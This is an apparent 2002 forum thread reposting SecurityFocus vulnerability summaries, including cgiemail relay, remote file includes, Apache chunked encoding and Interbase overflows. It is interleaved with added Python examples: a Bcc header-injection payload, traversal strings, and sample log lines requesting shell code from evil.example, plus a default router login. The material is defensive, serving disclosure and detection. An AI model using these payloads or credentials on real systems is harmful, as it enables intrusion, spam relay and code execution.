Old 06-25-2002, 03:45 PM   #1
unSpawn
Moderator
 
LQ weekly security rep - Jun 27th 2002


June 26th 2002
alert
OpenSSH vulnerability disclosed (alert thnx to Jeremy), or right on to the OpenSSH statement, the ISS statement or the CERT advisory CA-2002-18 (which as usual contains statements from various vendors). Please note upgrading to OpenSSH 3.4(portable)1 seems a Good Thing(tm) as it "adds checks for a class of potential bugs (ISS advisory rev 2)".

More on the recent OpenSSH vulnerability (alert thnx to neo77777).

June 26th 2002
mod_ssl-2.8.10 release (Jun 24th) fixes an off-by-one buffer overflow bug affecting compatibility functionality only. (Jedi/Sector One:SF-vulndev)

June 25th 2002
26 entries on tap. (SF)

1. MIT CGIEmail Arbitrary Recipient Mail Relay Vulnerability
7. Digi-Net Technologies DigiChat User IP Information Disclosure Vulnerability
8. Multiple Vendor Spoofed IGMP Report Denial Of Service Vulnerability
9. Mewsoft NetAuction Cross Site Scripting Vulnerability
10. PHP Classifieds Cross-Site Scripting Vulnerability
11. PHPEventCalendar Remote Command Execution Vulnerability
16. Zeroboard PHP Include File Arbitrary Command Execution Vulnerability
17. My Postcards MagicCard.CGI Arbitrary File Disclosure Vulnerability
18. Caucho Technology Resin Server View_Source.JSP Arbitrary File Disclosure Vulnerability
19. Caucho Technology Resin Server Denial Of Service Vulnerability
20. Apache Chunked-Encoding Memory Corruption Vulnerability
21. Wolfram Research webMathematica File Disclosure Vulnerability
22. Zyxel Prestige 642R Malformed Packet Denial Of Service Vulnerability
23. NetGear RP114 Administrative Access Via External Interface Vulnerability
24. PHPBB2 Install.PHP Remote File Include Vulnerability
26. OSCommerce Remote File Include Vulnerability
27. PHP-Address Remote File Include Vulnerability
31. Interbase GDS_Drop Interbase Environment Variable Buffer Overflow Vulnerability
32. Interbase GDS_Lock_MGR Interbase Environment Variable Buffer Overflow Vulnerability
33. WebScripts WebBBS Remote Command Execution Vulnerability
34. DeepMetrix LiveStats HTML Report Script Injection Vulnerability
35. 4D WebServer Long HTTP Request Buffer Overflow Vulnerability
36. phpShare Arbitrary Remote PHP File Include Vulnerability
37. Mandrake 8.2 Msec Insecure Default Permissions Vulnerability
38. UnixWare / Open UNIX ppptalk Local Privilege Escalation Vulnerability
40. IRSSI Long Malformed Topic Denial Of Service Vulnerability

Last edited by unSpawn; 06-27-2002 at 04:39 AM.
 
Old 06-25-2002, 03:46 PM   #2
unSpawn
Pt 1

------------------------------
SecurityFocus Newsletter 150

1. MIT CGIEmail Arbitrary Recipient Mail Relay Vulnerability
BugTraq ID: 5013
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5013
Summary:

MIT cgiemail is designed to take the input of web forms and convert it to
an e-mail format defined by the author of the form. It was written for use
on UNIX and Linux variant operating systems.

A vulnerability has been reported for cgiemail that allows cgiemail to act
as an open relay for email. The vulnerability is due to failure of proper
sanitization of user-supplied values. In particular, the newline code "%0a"
is not filtered properly.

cgiemail uses templates when generating emails. To exploit this issue, an
attacker must know the exact path of a template file that cgiemail uses.
As well, the attacker must know of the fields that will be included in the
generated email.

As a result, a malicious user may trivially specify any email address,
effectively using the script as an open mail relay. This technique is well
known, and commonly used for sending unsolicited email.

7. Digi-Net Technologies DigiChat User IP Information Disclosure Vulnerability
BugTraq ID: 5019
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5019
Summary:

DigiChat is a web based chat application maintained by Digi-Net. DigiChat
runs on most Microsoft Windows and UNIX platforms.

It is possible for chat users to obtain sensitive information about other
chat visitors.

By design, only ChatMasters are able to resolve the IP address of visiting
chat users. However, it is reportedly possible for users to obtain the IP
address of chat visitors by including '<Param Name="Showip" Value="True">'
in the chat applet. As a result, IP address information is disclosed when
viewing the information details of visitors.

An attacker may exploit this flaw to gain unauthorized access to sensitive
information about site users.

This issue has been reported in DigiChat 3.5, however other versions may
also be affected by this.

8. Multiple Vendor Spoofed IGMP Report Denial Of Service Vulnerability
BugTraq ID: 5020
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5020
Summary:

Internet Group Management Protocol (IGMP) specifies the guidelines for the
management of Internet multicast routing.

A problem with the implementation of the protocol in some operating
systems could lead to a denial of service.

It is possible for an arbitrary host to deny service to a system on the
same segment of network. In a situation where a multicast router sends a
membership report request, a host sending a unicast membership report
response to the primary responder can prevent the responder from sending a
message to the multicast router. In doing so, the router will not receive
a response from any host, and thus the transmission will time out and
cease.

This problem could result in an attacker launching a denial of service
against an affected host, and could additionally be used to deny service
to a range of vulnerable hosts on a subnet.

This vulnerability may additionally affect other operating systems, though
it is currently unknown which implementations may be vulnerable.

9. Mewsoft NetAuction Cross Site Scripting Vulnerability
BugTraq ID: 5023
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5023
Summary:

Mewsoft NetAuction is designed for users to create auction sites. It is
developed for use with Microsoft Windows and Linux operating environments.

NetAuction does not filter script code from URI parameters, making it
prone to cross-site scripting attacks. Attacker-supplied HTML code may be
included in a malicious link to 'auction.cgi' via the 'terms' parameter.

The supplied HTML code will be executed in the browser of a web user who
visits this link, in the security context of the host running NetAuction.
Such a link might be included in an HTML e-mail or on a malicious webpage.

This may enable a remote attacker to steal cookie-based authentication
credentials from legitimate users of a host running NetAuction.

This issue has been reported in version 3.0, other versions may also be
vulnerable.

10. PHP Classifieds Cross-Site Scripting Vulnerability
BugTraq ID: 5022
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5022
Summary:

PHP Classifieds is web-based classifieds software. It will run on most
Unix and Linux variants.

PHP Classifieds has been reported to be prone to cross-site scripting
attacks. This issue results from the failure of 'latestwap.php' to
sanitize user-supplied input. Attackers may inject arbitrary HTML or
script code into the 'url' URI parameter via a malicious link. When the
malicious link is visited, the attacker's script code will be executed in
the web client of the user browsing the link, in the security context of
the website hosting the vulnerable software.

This may potentially be exploited to steal cookie-based authentication
credentials from legitimate users of the site hosting the software.

11. PHPEventCalendar Remote Command Execution Vulnerability
BugTraq ID: 5021
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5021
Summary:

PHPEventCalendar is a web based calendar. It is implemented in PHP and
should be supported on UNIX and Linux variants as well as Microsoft
Windows operating environments.

A vulnerability has been reported in phpEventCalendar that may allow a
user of phpEventCalendar to execute commands on a vulnerable host.

The vulnerability exists in the 'index.php' file. The user supplied value
to the 'userfile' parameter is not properly sanitized.

Commands executed via this method will be executed with the privileges of
the user running the web server process. This could potentially lead to a
denial of service, or a remote attacker gaining elevated privileges.

16. Zeroboard PHP Include File Arbitrary Command Execution Vulnerability
BugTraq ID: 5028
Remote: Yes
Date Published: Jun 15 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5028
Summary:

Zeroboard is a PHP web board package available for the Linux and Unix
platforms.

A problem with Zeroboard could make it possible for remote users to
execute arbitrary commands.

Under some circumstances, it may be possible to include arbitrary PHP
files. The _head.php file does not sufficiently check or sanitize input.
When the "allow_url_fopen" variable and the "register_globals" variable in
php.ini are set to "On," it is possible to load a PHP include file from a
remote URL via the _head.php script.

Upon loading the arbitrary include file, commands embedded in the file
would be executed on the vulnerable server with the privileges of the HTTP
process. This problem could allow an attacker to execute arbitrary
commands on the vulnerable system.
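Worked example for the cgiemail entry above (BID 5013). This is an added illustration, not cgiemail's code: a constructed template and a form value carrying "%0a" show how the decoded newline lets the attacker's text continue as a Bcc header of its own, turning the form handler into a relay, and a checked variant refuses CR/LF only in fields the template places in the header block. The template, field names, addresses and attacker input are all made up for the example.

```python
"""
Mail-header injection of the kind reported for MIT cgiemail (BID 5013):
a form value that the template places in a header carries an encoded
newline (%0a), so the attacker's text continues as a header of its own.
Added example, not cgiemail's code; the template, field names and the
attacker input are constructed for illustration.
"""
import email
from email.utils import getaddresses
from urllib.parse import unquote_plus

# Constructed cgiemail-style template: the form author decides which
# fields land in the header block and which in the body.
TEMPLATE = (
    "To: webmaster@example.org\n"
    "From: [email]\n"
    "Subject: Contact form from [name]\n"
    "\n"
    "[message]\n"
)


def render_unsafe(template: str, form: dict) -> str:
    """Substitute the URL-decoded form values verbatim (the vulnerable behaviour)."""
    out = template
    for field, raw in form.items():
        out = out.replace(f"[{field}]", unquote_plus(raw))
    return out


def render_safe(template: str, form: dict) -> str:
    """Refuse CR or LF in any value that is substituted inside the header block.

    Body-bound fields may still contain newlines; only header fields can
    grow extra recipients, so only they are policed.
    """
    header_block, _, _body = template.partition("\n\n")
    out = template
    for field, raw in form.items():
        value = unquote_plus(raw)
        if f"[{field}]" in header_block and ("\r" in value or "\n" in value):
            raise ValueError(f"newline in header-bound field {field!r}")
        out = out.replace(f"[{field}]", value)
    return out


def recipients(rendered: str) -> list:
    """Parse the rendered message and list every address the MTA would deliver to."""
    msg = email.message_from_string(rendered)
    found = []
    for header in ("To", "Cc", "Bcc"):
        found.extend(addr for _name, addr in getaddresses(msg.get_all(header, [])))
    return found


# Constructed attacker input: the 'email' field ends with %0a and a Bcc header.
ATTACK_FORM = {
    "email": "attacker@example.net%0aBcc: victim1@example.com, victim2@example.com",
    "name": "spam run",
    "message": "buy now",
}

if __name__ == "__main__":
    print(recipients(render_unsafe(TEMPLATE, ATTACK_FORM)))
    try:
        render_safe(TEMPLATE, ATTACK_FORM)
    except ValueError as exc:
        print("rejected:", exc)
```

The vulnerable path delivers to three addresses although the template names one; the checked path rejects the request outright rather than trying to strip the newline, which is the safer choice when the same value might also be percent-encoded twice or carry a bare "\r".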
 
Old 06-25-2002, 03:47 PM   #3
unSpawn
Pt 2

17. My Postcards MagicCard.CGI Arbitrary File Disclosure Vulnerability
BugTraq ID: 5029
Remote: Yes
Date Published: Jun 15 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5029
Summary:

My Postcards is a commercially available electronic postcard system. It is
available for Unix and Linux operating systems.

A problem with My Postcards could make it possible for a remote attacker
to disclose the contents of arbitrary files.

The magiccard.cgi script does not properly handle some types of input.
As a result, it may be possible for a remote user to specify the location
of a specific file on the system hosting the My Postcards software. Upon
specifying the location of a file that is readable by the web server
process, the user could disclose the contents of the specified file.

This problem could lead to a remote user gaining access to sensitive
information on a system. This could include information such as access
control passwords, or other information stored on the server not meant for
public access.

18. Caucho Technology Resin Server View_Source.JSP Arbitrary File Disclosure Vulnerability
BugTraq ID: 5031
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5031
Summary:

Caucho Technology Resin is a servlet and JSP (Java Server Pages) engine
that supports Java and JavaScript. It is built for Unix and Linux variants
as well as Microsoft Windows operating environments.

A vulnerability has been reported in Resin Server 2.1.2, deployed on a
Microsoft Windows platform, that may allow remote attackers to view
contents of arbitrary files.

The 'view_source.jsp' script, found in an example folder as part of the
Resin Server installation, may allow remote attackers access to files
readable by the web server.

The vulnerability occurs when parsing requests for directory traversal.
The 'view_source.jsp' script prevents directory traversal via '/../'
sequences. However, an attacker attempting directory traversal via '\..\'
sequences will succeed. This may allow an attacker to request any files on
the vulnerable system readable by the web server.

This problem could lead to a remote user gaining access to sensitive
information on a system. This could include information such as access
control passwords, or other information stored on the server not meant for
public access.

19. Caucho Technology Resin Server Denial Of Service Vulnerability
BugTraq ID: 5032
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5032
Summary:

Caucho Technology Resin is a servlet and JSP (Java Server Pages) engine
that supports Java and JavaScript. It is built for Unix and Linux variants
as well as Microsoft Windows operating environments.

A vulnerability has been reported in Resin Server 2.1.1, deployed on a
Microsoft Windows platform, that may cause Resin Server to cease
functioning properly leading to a denial of service condition.

The vulnerability occurs when a client accesses non-existent resources.
If large variables are defined for such requests, parts (if not all) of
Resin will cease to be fully operational. A denial of service condition
may result.

An attacker may take advantage of this vulnerability to deny service to
legitimate users.

20. Apache Chunked-Encoding Memory Corruption Vulnerability
BugTraq ID: 5033
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5033
Summary:

Apache is a freely available webserver for Unix and Linux variants, as
well as Microsoft operating systems.

The HTTP protocol specifies a method of data coding called 'Chunked
Encoding', designed to facilitate fragmentation of HTTP requests in
transit. A vulnerability has been discovered in the Apache implementation
of 'Chunked Encoding'.

When processing requests coded with the 'Chunked Encoding' mechanism,
Apache fails to properly calculate required buffer sizes. This may be due
to improper (signed) interpretation of an unsigned integer value.

Consequently, several conditions may occur that have security
implications. It has been reported that a buffer overrun and signal race
condition occur. Exploitation of these conditions may result in the
execution of arbitrary code.

On Windows and Netware platforms, Apache uses threads within a single
server process to handle concurrent connections. Causing the server
process to crash on these platforms may result in a denial of service.

It has been confirmed that this vulnerability may be exploited to execute
arbitrary code on both Win32 and UNIX platforms.

Note: Products which use or bundle Apache such as Oracle 9iAS or IBM
Websphere may also be affected.

21. Wolfram Research webMathematica File Disclosure Vulnerability
BugTraq ID: 5035
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5035
Summary:

Wolfram Research's webMathematica is a Java based product which allows the
inclusion of Mathematica content in a web environment. It includes CGI
programs which generate image content based on user supplied input.

A file disclosure vulnerability has been reported with the MSP CGI
program. MSP is capable of redirecting an HTTP request to a dynamically
generated image, and accepts the filename as a CGI parameter. The user
supplied file name is not properly validated before the file is displayed.

An attacker may include "../" characters in the specified filename, and
escape the specified web root. Arbitrary system files may be disclosed to
the remote user. The disclosure of sensitive system information may aid in
further attacks against the vulnerable system.

22. Zyxel Prestige 642R Malformed Packet Denial Of Service Vulnerability
BugTraq ID: 5034
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5034
Summary:

ZyXEL 642R routers have difficulties handling packets with certain TCP
options enabled. In particular, it is possible to deny services by
sending a vulnerable router a SYN-ACK packet. This type of malformed
packet will create a denial of service which can only be remedied by
restarting the device. To a lesser degree, the router also encounters
difficulties when handling SYN-FIN packets. SYN-FIN packets have been
reported to deny service for the duration of a few minutes. This issue
has also been reproduced with other types of malformed packets.

In both instances, some services provided by the router (telnet, FTP and
DHCP) will be denied, however, the device will continue to route network
traffic.

ZyXEL 642R-11 routers are reportedly affected by this vulnerability. It
is possible that other ZyNOS-based routers are also affected by this
vulnerability. ZyXEL 643 ADSL routers do not appear to be prone to this
issue.

This issue may be exploited in combination with the vulnerability
described in Bugtraq ID 3346.

23. NetGear RP114 Administrative Access Via External Interface Vulnerability
BugTraq ID: 5036
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5036
Summary:

The NetGear RP114 router includes administrative support through a variety
of mechanisms, including telnet and HTTP. Access to administration tools
is granted to systems with the address 192.168.0.1, reserved for use on
internal networks.

Reportedly, the RP114 router will accept traffic from addresses in the
192.168.x.x range on its external interface. An attacker external to the
router may be able to connect to the device from this IP, and access the
administrative interface. An attacker may be able to gain access to
sensitive information, or to create a denial of service condition for
legitimate users of the router.

Authentication is still required, however the device has a commonly known
default username of 'admin' with the password '1234'.

Other related devices may share this vulnerability; this has not, however,
been confirmed.

24. PHPBB2 Install.PHP Remote File Include Vulnerability
BugTraq ID: 5038
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5038
Summary:

phpBB2 is an open-source web forum application that is written in PHP and
backended by a number of database products. It will run on most Unix and
Linux variants, as well as Microsoft Windows operating systems.

A problem has been discovered in phpBB2 which may enable an attacker to
include an arbitrary attacker-supplied file which is located on a remote
host.

The problem is that an arbitrary path can be specified as a value for the
'phpbb_root_path' URL parameter. This issue exists in the 'install.php'
script. An attacker may exploit this vulnerability by supplying the
location of a remote file as the value for the 'phpbb_root_path' URL
parameter.

In the case that the remote file is a PHP script, this may allow commands
to be executed remotely with the privileges of the webserver. Successful
exploitation will allow a remote attacker to gain local, interactive
access to a host running the vulnerable software. This is especially a
concern for hosts running Microsoft Windows operating systems, as
webservers are generally run with SYSTEM privileges on these platforms.
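Worked example for the Resin view_source.jsp entry above (BID 5031), and the same containment test covers the plain "../" case reported for webMathematica (BID 5035). This is an added illustration, not Caucho's or Wolfram's code: a constructed blacklist that refuses only "/../" is shown alongside a check that canonicalises the path with the target platform's own separator rules (ntpath, since the report concerns a Windows deployment) and then tests that the result stays under the document root. The root and the request paths are made up for the example.

```python
"""
The directory-traversal filter bypass reported for Resin's view_source.jsp
(BID 5031): the check refuses '/../' but the Windows filesystem also honours
'\\..\\'. Added example, not Caucho's code; the document root, request paths
and the blacklist itself are constructed for illustration.
"""
import ntpath

DOC_ROOT = "C:/resin/doc"   # constructed web root on a Windows host


def allowed_blacklist(requested: str) -> bool:
    """The flawed check: only the forward-slash spelling of '..' is refused."""
    return "/../" not in "/" + requested


def allowed_normalised(requested: str, root: str = DOC_ROOT) -> bool:
    """Canonicalise with the target platform's own rules, then test containment.

    ntpath treats both '/' and '\\' as separators, exactly as Win32 does,
    so '..\\' and '../' collapse the same way before the prefix test.
    A request naming another drive (e.g. 'D:\\x') also fails containment.
    """
    full = ntpath.normpath(ntpath.join(root, requested.lstrip("/\\")))
    root_n = ntpath.normpath(root)
    full, root_n = full.lower(), root_n.lower()     # NTFS names are case-insensitive
    return full == root_n or full.startswith(root_n + "\\")


if __name__ == "__main__":
    for path in ("examples/view_source.jsp", "../../etc/passwd", "..\\..\\windows\\win.ini"):
        print(f"{path!r}: blacklist={allowed_blacklist(path)} "
              f"normalised={allowed_normalised(path)}")
```

On a Unix host the same shape works with posixpath in place of ntpath; what must not change is the order of operations, normalise first and compare afterwards, since any blacklist applied to the raw string has to enumerate every spelling the filesystem will accept.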
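Worked example for the Apache chunked-encoding entry above (BID 5033). The summary says the miscalculation "may be due to improper (signed) interpretation of an unsigned integer value"; this added example models that class of bug on a 32-bit build and is not Apache's code. A chunk-size line is parsed, reinterpreted as a signed word, bounds-checked while signed and then used as an unsigned length, so a value like FFFFFFF0 slips past the check as -16 and becomes a near-4 GiB copy. The buffer size and the chunk-size lines are constructed.

```python
"""
The signed/unsigned confusion the Apache chunked-encoding advisory (BID 5033)
points at, modelled on a 32-bit build. Added example, not Apache's code; the
buffer size and the chunk-size lines are constructed for illustration.
"""
WORD_BITS = 32
WORD_MASK = (1 << WORD_BITS) - 1
BUF_SIZE = 8192            # constructed size of the receive buffer


def parse_chunk_size(line: bytes) -> int:
    """Read the hex chunk-size field (HTTP/1.1 allows a ';ext' suffix), unsigned."""
    field = line.split(b";", 1)[0].strip()
    if not field or any(c not in b"0123456789abcdefABCDEF" for c in field):
        raise ValueError("malformed chunk-size line")
    return int(field, 16)


def to_signed(value: int, bits: int = WORD_BITS) -> int:
    """Reinterpret an unsigned machine word as a two's-complement signed one."""
    value &= (1 << bits) - 1
    return value - (1 << bits) if value >> (bits - 1) else value


def bytes_to_copy_signed(line: bytes) -> int:
    """Vulnerable pattern: size held in a signed long, bounds-checked while
    signed, then handed to a size_t copy. Returns the length the copy uses."""
    size = to_signed(parse_chunk_size(line))
    if size > BUF_SIZE:           # a negative size never trips this test
        raise ValueError("chunk larger than buffer")
    return size & WORD_MASK       # -16 becomes 0xFFFFFFF0 on the way into memcpy()


def bytes_to_copy_fixed(line: bytes) -> int:
    """Fixed pattern: keep the value unsigned and refuse what will not fit."""
    size = parse_chunk_size(line)
    if size > BUF_SIZE:
        raise ValueError("chunk larger than buffer")
    return size


if __name__ == "__main__":
    for line in (b"1000\r\n", b"FFFFFFF0\r\n"):
        for label, fn in (("signed path", bytes_to_copy_signed), ("fixed path", bytes_to_copy_fixed)):
            try:
                print(line, label, "copies", hex(fn(line)))
            except ValueError as exc:
                print(line, label, exc)
```

The point is the comparison, not the parser: both versions read the same hex field, but only the second compares it as the unsigned quantity the copy routine will receive. The same shape appears wherever a length is parsed with a signed routine and checked with a signed comparison.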
 
Old 06-25-2002, 03:49 PM   #4
unSpawn
Pt 3

26. OSCommerce Remote File Include Vulnerability
BugTraq ID: 5037
Remote: Yes
Date Published: Jun 16 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5037
Summary:

osCommerce is open-source e-commerce software written in PHP. osCommerce
will run on most Unix and Linux variants as well as Microsoft Windows
operating systems.

osCommerce is prone to an issue which may allow remote attackers to
include arbitrary files located on remote servers. This issue is present
in 'include_once.php'. An attacker may exploit this by supplying a
path to a file on a remote host as a value for the 'include_file'
parameter.

If the remote file is a PHP script, this may allow for execution of
attacker-supplied PHP code with the privileges of the webserver.
Successful exploitation may gain the attacker local access on the affected
host.

27. PHP-Address Remote File Include Vulnerability
BugTraq ID: 5039
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5039
Summary:

PHP-Address is an open-source web-based address database written in PHP.

PHP-Address is prone to an issue which may allow remote attackers to
include arbitrary files located on remote servers. This issue is present
in the 'globals.php3' script. An attacker may exploit this by supplying a
path to a file on a remote host as a value for the 'LangCookie' parameter.

If the remote file is a PHP script, this may allow for execution of
attacker-supplied PHP code with the privileges of the webserver.
Successful exploitation may provide local access to the attacker.

31. Interbase GDS_Drop Interbase Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 5044
Remote: No
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5044
Summary:

Interbase is a database distributed and maintained by Borland. It is
available for Unix and Linux operating systems.

A problem with Interbase could make it possible for a local user to gain
elevated privileges.

A buffer overflow has been discovered in the setuid root gds_drop program
packaged with Interbase. This problem could allow a local user to execute
the program with strings of arbitrary length. By using a custom crafted
string, the attacker could overwrite stack memory, including the return
address of a function, and potentially execute arbitrary code as root.

The vulnerability occurs in the INTERBASE environment variable. When the
gds_drop program is executed with a string of arbitrary length (typically
500 or more characters) in the INTERBASE environment variable, the result
is an exploitable buffer overflow.

This could make it possible for a local user to gain administrative
access.

32. Interbase GDS_Lock_MGR Interbase Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 5046
Remote: No
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5046
Summary:

Interbase is a database distributed and maintained by Borland. It is
available for Unix and Linux operating systems.

A problem with Interbase could make it possible for a local user to gain
elevated privileges.

A buffer overflow has been discovered in the setuid root program
gds_lock_mgr, packaged with Interbase. This problem could allow a local
user to execute the program with strings of arbitrary length. By using a
custom crafted string, the attacker could overwrite stack memory,
including the return address of a function, and potentially execute
arbitrary code as root.

The vulnerability occurs in the INTERBASE environment variable. When the
gds_lock_mgr program is executed with a string of arbitrary length
(typically 500 or more bytes) in the INTERBASE environment variable, the
result is an exploitable buffer overflow.

This could make it possible for a local user to gain administrative
access.

33. WebScripts WebBBS Remote Command Execution Vulnerability
BugTraq ID: 5048
Remote: Yes
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5048
Summary:

WebBBS is web-based BBS software, written in Perl. WebBBS was designed to
run on Unix and Linux variants.

WebBBS does not sufficiently filter shell metacharacters from CGI
parameters. As a result, remote attackers may execute arbitrary commands
on the underlying shell of the system hosting the vulnerable software.
This issue is known to exist in the 'webbbs_post.pl' script and is due to
insufficient filtering of the 'followup' CGI variable.

Remote attackers may gain local, interactive access to the host with the
privileges of the webserver process as a result of successful
exploitation.

34. DeepMetrix LiveStats HTML Report Script Injection Vulnerability
BugTraq ID: 5047
Remote: Yes
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5047
Summary:

LiveStats parses web server log files into an SQL database, enabling a
user to generate reports defining site traffic. The HTML generated reports
are viewed through the LiveStats web browser interface. LiveStats runs on
Microsoft Windows and is maintained by DeepMetrix, formerly known as
MediaHouse Software.

LiveStats does not filter HTML tags when generating reports. As a result,
it is possible for an attacker to cause arbitrary script code to be
included in HTML reports generated by LiveStats. When a user views the
report page via the browser interface, the script code will be executed in
their browser, in the context of the LiveStats host.

Reportedly, LiveStats displays the browser-tag and referer strings in the
HTML generated reports. Therefore, including script code in the
HTTP_Referer header when submitting a web request for a page being
monitored by LiveStats, will result in the execution of the embedded
script code.

This issue might be exploited to steal cookie-based authentication
credentials from a legitimate user of the software.

This issue has been reported in 6.2, prior versions may also be affected
by this issue.

35. 4D WebServer Long HTTP Request Buffer Overflow Vulnerability
BugTraq ID: 5045
Remote: Yes
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5045
Summary:

4D WebServer is a client/server database management system with integrated
web development and serving. It runs on Microsoft Windows and MacOS
operating systems.

Due to insufficient bounds checking of HTTP requests, 4D WebServer is
prone to a buffer overflow condition. It is possible to overwrite stack
variables such as the return address by overflowing either of these
fields. This may enable a remote attacker to cause a denial of service or
execute attacker-supplied instructions.

It should be noted that the software will run in the SYSTEM context on
multi-user Windows operating systems, so successful exploitation may
result in a full compromise of the host.

This issue may be similar to the vulnerability discussed in BID 4665, 4D
WebServer Authentication Buffer Overflow.

This issue was reported for 4D WebServer version 6.7.3, earlier versions
may also be affected.

36. phpShare Arbitrary Remote PHP File Include Vulnerability
BugTraq ID: 5049
Remote: Yes
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5049
Summary:

phpShare provides upload and download functionality via a web interface.
phpShare is freely available and is maintained by Drak0n.

phpShare is prone to an issue which may allow remote attackers to include
arbitrary files located on remote servers. This issue is present in the
'phpshare.php' script.

If the remote file is a PHP script, this may allow for execution of
attacker-supplied PHP code with the privileges of the webserver.
Successful exploitation may provide local access to the attacker.

37. Mandrake 8.2 Msec Insecure Default Permissions Vulnerability
BugTraq ID: 5050
Remote: No
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5050
Summary:

Mandrake ships with an interface for setting and maintaining system-wide
security policy during an install of the operating system. This
functionality is provided by the Mandrake-Security package (msec).
Various settings provide differing levels of security.

The Mandrake 8.2 version of msec installs home directories with
world-readable permissions on the Standard security setting. This is
misleading as the Standard (msec level 2) security setting is intended to
be ideal for systems which have multiple local users. This may expose
contents of home directories to other local users. Additionally, msec
will proactively reset the permissions of home directories if they are
changed from the default world-readable permissions.

msec is a mandatory component of Mandrake 8.2 and may not be deselected
during an install of the operating system.

It should be noted that it is still possible to ensure more secure home
directory permissions by using a more restrictive msec setting.
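Worked example for the remote file include entries in this post (osCommerce 'include_file', PHP-Address 'LangCookie', phpShare) and the earlier ones for Zeroboard and phpBB2 ('phpbb_root_path'). This is an added detection example, not code from any of those projects: it parses Apache combined-format log lines and reports every query parameter whose value is itself a fetchable URL, which is what an include() call will retrieve when allow_url_fopen is on. The log lines are constructed, and the log pattern and the URL test are my own assumptions.

```python
"""
Spotting remote-file-include attempts such as those listed for osCommerce
('include_file'), PHP-Address ('LangCookie'), phpShare, Zeroboard and phpBB2
('phpbb_root_path') in an Apache combined access log. Added example, not
project code; the log lines are constructed and the request pattern and
parameter-value test are assumptions.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3}) (?P<size>\S+)'
)
# The tell-tale: a parameter whose value is itself a fetchable URL. With
# allow_url_fopen=On, include($that) pulls it from the attacker's host.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi(lines):
    """Return (client, script, parameter, value) for every URL-valued parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                hits.append((m["ip"], parts.path, name, value))
    return hits


# Constructed log lines; the hosts and paths are invented.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jun/2002:10:12:01 -0500] "GET /catalog/include_once.php?include_file=http://evil.example/cmd.txt HTTP/1.0" 200 512',
    '10.0.0.5 - - [18/Jun/2002:10:12:07 -0500] "GET /forum/install.php?phpbb_root_path=http://evil.example/shell.php%3F HTTP/1.1" 200 2048',
    '192.168.1.20 - - [18/Jun/2002:10:13:00 -0500] "GET /addr/globals.php3?LangCookie=en HTTP/1.0" 200 4096',
    '192.168.1.20 - - [18/Jun/2002:10:13:05 -0500] "GET /index.php?page=news&ref=http://www.example.org/ HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for client, script, name, value in find_rfi(SAMPLE_LOG):
        print(f"{client} {script} {name}={value}")
```

The fourth sample line is a deliberate false positive: a harmless referrer-style parameter also carries a URL, so the output is a triage list, not a verdict; match it against the scripts and parameter names in the advisories before acting. The fix on the server side is the one the Zeroboard entry implies: these includes only fetch remote code when allow_url_fopen and register_globals are On in php.ini, so turn both Off unless an application genuinely needs them.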
 
Old 06-25-2002, 03:49 PM   #5
unSpawn
Pt 4

38. UnixWare / Open UNIX ppptalk Local Privilege Escalation Vulnerability
BugTraq ID: 5051
Remote: No
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5051
Summary:

UnixWare and Open UNIX are operating systems maintained by Caldera
Systems.

The ppptalk utility is used to configure the UnixWare/Open UNIX PPP
subsystem. It is installed setuid root by default.

A vulnerability has been reported in the version of ppptalk included with
some versions of Caldera UnixWare and Open UNIX. A malicious local user
may be able to exploit this vulnerability to gain elevated privileges on
the vulnerable system.

The technical nature of this vulnerability is not currently known.

40. IRSSI Long Malformed Topic Denial Of Service Vulnerability
BugTraq ID: 5055
Remote: Yes
Date Published: Jun 19 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5055
Summary:

